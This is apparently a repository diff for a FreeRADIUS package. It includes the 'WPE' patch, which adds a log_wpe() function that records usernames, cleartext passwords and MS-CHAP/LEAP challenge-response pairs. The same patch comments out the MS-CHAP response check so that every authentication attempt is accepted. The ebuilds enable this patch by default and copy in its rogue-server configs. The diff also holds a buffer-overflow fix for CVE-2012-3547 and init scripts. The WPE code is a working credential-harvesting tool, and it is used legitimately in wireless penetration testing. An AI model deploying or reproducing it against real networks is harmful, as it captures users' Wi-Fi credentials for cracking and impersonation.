!
! #
! # If check_cert_issuer is set, the value will
! # be checked against the DN of the issuer in
! # the client certificate. If the values do not
! # match, the cerficate verification will fail,
! # rejecting the user.
! #
! # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
!
! #
! # If check_cert_cn is set, the value will
! # be xlat'ed and checked against the CN
! # in the client certificate. If the values
! # do not match, the certificate verification
! # will fail rejecting the user.
! #
! # This check is done only if the previous
! # "check_cert_issuer" is not set, or if
! # the check succeeds.
! #
! # check_cert_cn = %{User-Name}
! #
! # Set this option to specify the allowed
! # TLS cipher suites. The format is listed
! # in "man 1 ciphers".
! cipher_list = "DEFAULT"
!
! #
!
! # This configuration entry should be deleted
! # once the server is running in a normal
! # configuration. It is here ONLY to make
! # initial deployments easier.
! #
! make_cert_command = "${certdir}/bootstrap"
!
! #
! # Session resumption / fast reauthentication
! # cache.
! #
! cache {
! #
! # Enable it. The default is "no".
! # Deleting the entire "cache" subsection
! # Also disables caching.
! #
! # You can disallow resumption for a
! # particular user by adding the following
! # attribute to the control item list:
! #
! # Allow-Session-Resumption = No
! #
! # If "enable = no" below, you CANNOT
! # enable resumption for just one user
! # by setting the above attribute to "yes".
! #
! enable = no
!
! #
! # Lifetime of the cached entries, in hours.
! # The sessions will be deleted after this
! # time.
! #
! lifetime = 24 # hours
!
! #
! # The maximum number of entries in the
! # cache. Set to "0" for "infinite".
! #
! # This could be set to the number of users
! # who are logged in... which can be a LOT.
! #
! max_entries = 255
! }
! }
!
! # The TTLS module implements the EAP-TTLS protocol,
! # which can be described as EAP inside of Diameter,
! # inside of TLS, inside of EAP, inside of RADIUS...
! #
! # Surprisingly, it works quite well.
! #
! # The TTLS module needs the TLS module to be installed
! # and configured, in order to use the TLS tunnel
! # inside of the EAP packet. You will still need to
! # configure the TLS module, even if you do not want
! # to deploy EAP-TLS in your network. Users will not
! # be able to request EAP-TLS, as it requires them to
! # have a client certificate. EAP-TTLS does not
! # require a client certificate.
! #
! # You can make TTLS require a client cert by setting
! #
! # EAP-TLS-Require-Client-Cert = Yes
! #
! # in the control items for a request.
! #
ttls {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # TTLS tunnel, we recommend using EAP-MD5.
- # If the request does not contain an EAP
- # conversation, then this configuration entry
- # is ignored.
- default_eap_type = md5
-
- # The tunneled authentication request does
- # not usually contain useful attributes
- # like 'Calling-Station-Id', etc. These
- # attributes are outside of the tunnel,
- # and normally unavailable to the tunneled
- # authentication request.
- #
- # By setting this configuration entry to
- # 'yes', any attribute which NOT in the
- # tunneled authentication request, but
- # which IS available outside of the tunnel,
- # is copied to the tunneled request.
- #
- # allowed values: {no, yes}
- copy_request_to_tunnel = no
-
- # The reply attributes sent to the NAS are
- # usually based on the name of the user
- # 'outside' of the tunnel (usually
- # 'anonymous'). If you want to send the
- # reply attributes based on the user name
- # inside of the tunnel, then set this
- # configuration entry to 'yes', and the reply
- # to the NAS will be taken from the reply to
- # the tunneled request.
- #
- # allowed values: {no, yes}
- use_tunneled_reply = no
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- virtual_server = "inner-tunnel"
-
- # This has the same meaning as the
- # same field in the "tls" module, above.
- # The default value here is "yes".
- # include_length = yes
}
!
! ##################################################
! #
! # !!!!! WARNINGS for Windows compatibility !!!!!
! #
! ##################################################
! #
! # If you see the server send an Access-Challenge,
! # and the client never sends another Access-Request,
! # then
! #
! # STOP!
! #
! # The server certificate has to have special OID's
! # in it, or else the Microsoft clients will silently
! # fail. See the "scripts/xpextensions" file for
! # details, and the following page:
! #
! # http://support.microsoft.com/kb/814394/en-us
! #
! # For additional Windows XP SP2 issues, see:
! #
! # http://support.microsoft.com/kb/885453/en-us
! #
! # Note that we do not necessarily agree with their
! # explanation... but the fix does appear to work.
! #
! ##################################################
!
! #
! # The tunneled EAP session needs a default EAP type
! # which is separate from the one for the non-tunneled
! # EAP module. Inside of the TLS/PEAP tunnel, we
! # recommend using EAP-MS-CHAPv2.
! #
! # The PEAP module needs the TLS module to be installed
! # and configured, in order to use the TLS tunnel
! # inside of the EAP packet. You will still need to
! # configure the TLS module, even if you do not want
! # to deploy EAP-TLS in your network. Users will not
! # be able to request EAP-TLS, as it requires them to
! # have a client certificate. EAP-PEAP does not
! # require a client certificate.
! #
! #
! # You can make PEAP require a client cert by setting
! #
! # EAP-TLS-Require-Client-Cert = Yes
! #
! # in the control items for a request.
! #
! peap {
! # The tunneled EAP session needs a default
! # EAP type which is separate from the one for
! # the non-tunneled EAP module. Inside of the
! # PEAP tunnel, we recommend using MS-CHAPv2,
! # as that is the default type supported by
! # Windows clients.
default_eap_type = mschapv2
!
! # the PEAP module also has these configuration
! # items, which are the same as for TTLS.
! copy_request_to_tunnel = no
! use_tunneled_reply = no
!
! # When the tunneled session is proxied, the
! # home server may not understand EAP-MSCHAP-V2.
! # Set this entry to "no" to proxy the tunneled
! # EAP-MSCHAP-V2 as normal MSCHAPv2.
! # proxy_tunneled_request_as_eap = yes
!
! #
! # The inner tunneled request can be sent
! # through a virtual server constructed
! # specifically for this purpose.
! #
! # If this entry is commented out, the inner
! # tunneled request will be sent through
! # the virtual server that processed the
! # outer requests.
! #
! virtual_server = "inner-tunnel"
}
-
- #
- # This takes no configuration.
- #
- # Note that it is the EAP MS-CHAPv2 sub-module, not
- # the main 'mschap' module.
- #
- # Note also that in order for this sub-module to work,
- # the main 'mschap' module MUST ALSO be configured.
- #
- # This module is the *Microsoft* implementation of MS-CHAPv2
- # in EAP. There is another (incompatible) implementation
- # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
- # currently support.
- #
mschapv2 {
}
}
--- 1,33 ----
eap {
! default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
! cisco_accounting_username_bug = yes
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
private_key_password = whatever
! private_key_file = ${raddbdir}/certs/server.pem
! certificate_file = ${raddbdir}/certs/server.pem
! CA_file = ${raddbdir}/certs/ca.pem
! dh_file = ${raddbdir}/certs/dh
! random_file = ${raddbdir}/certs/random
! fragment_size = 1024
! include_length = yes
! }
ttls {
}
! peap {
default_eap_type = mschapv2
! #copy_request_to_tunnel = no
! #use_tunneled_reply = no
! #proxy_tunneled_request_as_eap = yes
}
mschapv2 {
}
}
diff -crB freeradius-server-2.1.7/raddb/radiusd.conf.in freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in
*** freeradius-server-2.1.7/raddb/radiusd.conf.in Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in Thu Nov 12 00:19:52 2009
***************
*** 466,472 ****
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
!
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
--- 466,472 ----
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
! wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h Thu Nov 12 00:18:30 2009
***************
*** 361,366 ****
--- 361,367 ----
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -crB freeradius-server-2.1.7/src/main/auth.c freeradius-server-2.1.7-wpe/src/main/auth.c
*** freeradius-server-2.1.7/src/main/auth.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/auth.c Thu Nov 12 00:18:30 2009
***************
*** 339,344 ****
--- 339,345 ----
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -crB freeradius-server-2.1.7/src/main/log.c freeradius-server-2.1.7-wpe/src/main/log.c
*** freeradius-server-2.1.7/src/main/log.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/log.c Thu Nov 12 00:18:30 2009
***************
*** 28,33 ****
--- 28,36 ----
#include <freeradius-devel/radiusd.h>
+ #include <stdio.h>
+ #include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
***************
*** 258,263 ****
--- 261,314 ----
return r;
}
+ void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+ }
+
/*
* Dump a whole list of attributes to DEBUG2
diff -crB freeradius-server-2.1.7/src/main/mainconfig.c freeradius-server-2.1.7-wpe/src/main/mainconfig.c
*** freeradius-server-2.1.7/src/main/mainconfig.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/mainconfig.c Thu Nov 12 00:18:30 2009
***************
*** 228,234 ****
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
!
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
--- 228,234 ----
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
! { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c Thu Nov 12 00:18:30 2009
***************
*** 244,254 ****
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
!
/*
* No password or previous packet. Die.
--- 244,254 ----
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
! unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
***************
*** 266,271 ****
--- 266,272 ----
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
***************
*** 416,421 ****
--- 417,424 ----
*/
for (i = 0; i < reply->count; i++) {
reply->challenge[i] = fr_rand();
+ /* WPE - Fixed challenge */
+ // reply->challenge[i] = 0;
}
DEBUG2(" rlm_eap_leap: Issuing AP Challenge");
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h Thu Nov 12 00:18:30 2009
***************
*** 68,74 ****
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
--- 68,74 ----
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c Thu Nov 12 00:18:30 2009
***************
*** 133,139 ****
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
! rcode = eapleap_stage4(packet, password, session);
session->stage = 6;
/*
--- 133,140 ----
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
! //rcode = eapleap_stage4(packet, password, session);
! rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -crB freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c
*** freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c Thu Nov 12 00:18:30 2009
***************
*** 736,745 ****
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
! uint8_t *nthashhash, int do_ntlm_auth)
{
uint8_t calculated[24];
/*
* Do normal authentication.
*/
--- 736,747 ----
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
! uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+
/*
* Do normal authentication.
*/
***************
*** 753,761 ****
--- 755,765 ----
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (memcmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
***************
*** 1188,1194 ****
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
! do_ntlm_auth) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
--- 1192,1198 ----
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
! do_ntlm_auth, username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
***************
*** 1268,1274 ****
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
! do_ntlm_auth) < 0) {
RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
--- 1272,1278 ----
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
! do_ntlm_auth, username_string) < 0) {
RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,

11
net-dialup/freeradius/files/freeradius-CVE-2012-3547.patch
View file

@ -1,11 +0,0 @@
--- freeradius-server-2.1.11.orig/src/modules/rlm_eap/types/rlm_eap_tls/rlm_eap_tls.c 2011-06-20 16:57:14.000000000 +0200
+++ freeradius-server-2.1.11/src/modules/rlm_eap/types/rlm_eap_tls/rlm_eap_tls.c 2012-09-11 13:55:45.000000000 +0200
@@ -484,7 +484,7 @@
*/
buf[0] = '\0';
asn_time = X509_get_notAfter(client_cert);
- if ((lookup <= 1) && asn_time && (asn_time->length < MAX_STRING_LEN)) {
+ if ((lookup <= 1) && asn_time && (asn_time->length < sizeof(buf))) {
memcpy(buf, (char*) asn_time->data, asn_time->length);
buf[asn_time->length] = '\0';
pairadd(&handler->certs,

12
net-dialup/freeradius/files/radius.conf-r3 Normal file
View file

@ -0,0 +1,12 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
# RADIUSD_USER=radius
# RADIUSD_GROUP=radius

29
net-dialup/freeradius/files/radius.init-r3 Normal file
View file

@ -0,0 +1,29 @@
#!/sbin/runscript
# Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/files/radius.init-r3,v 1.2 2012/10/22 02:58:59 flameeyes Exp $
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/var/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat /var/run/radiusd/radiusd.pid)
eend $?
}

156
net-dialup/freeradius/freeradius-2.1.11-r1.ebuild
View file

@ -1,156 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.11.ebuild,v 1.3 2011/10/13 12:16:12 nativemad Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
enewgroup radiusd
enewuser radiusd -1 -1 /var/log/radius radiusd
}
src_prepare() {
epatch "${FILESDIR}/${PN}-2.1.10-versionless-la-files.patch"
epatch "${FILESDIR}/${PN}-2.1.10-ssl.patch"
epatch "${FILESDIR}/${PN}-2.1.10-qafixes.patch"
epatch "${FILESDIR}/${PN}-2.1.10-pkglibdir.patch"
if use wpe; then epatch "${FILESDIR}/${P}-wpe.patch"; fi
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf} || die "econf failed"
}
src_compile() {
emake -j1 || die "emake failed"
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radiusd
dodir /etc/raddb
diropts -m0750 -o radiusd -g radiusd
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${D}" install || die "make install failed"
sed -i -e 's:^#user *= *nobody:user = radiusd:;s:^#group *= *nobody:group = radiusd:' \
"${D}"/etc/raddb/radiusd.conf
chown -R root:radiusd "${D}"/etc/raddb/*
pamd_mimic_system radiusd auth account password session
mv "${D}/usr/share/doc/${PN}" "${D}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r1" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${D}"/etc/raddb/certs
emake all
}

167
net-dialup/freeradius/freeradius-2.1.12.ebuild
View file

@ -1,167 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.12.ebuild,v 1.1 2011/11/20 18:54:06 mrness Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc ~x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
if has_version '<net-dialup/freeradius-2.1.12'; then
elog "Please remove radiusd group/user"
elog "New user/group is radius"
elog "please update /etc/raddb/radius.conf accordingly!"
fi
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${FILESDIR}/${P}-versionless-la-files.patch"
epatch "${FILESDIR}/${P}-ssl.patch"
epatch "${FILESDIR}/${P}-qafixes.patch"
epatch "${FILESDIR}/${P}-pkglibdir.patch"
use wpe && epatch "${FILESDIR}/${PN}-2.1.11-wpe.patch"
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf}
}
src_compile() {
emake -j1
#cd raddb
#emake
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${ED}" install
sed -i -e 's:^#user *= *nobody:user = radius:;s:^#group *= *nobody:group = radius:' \
"${ED}"/etc/raddb/radiusd.conf
chown -R root:radius "${ED}"/etc/raddb/*
pamd_mimic_system radius auth account password session
mv "${ED}/usr/share/doc/${PN}" "${ED}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${ED}/usr/sbin/rc.radiusd"
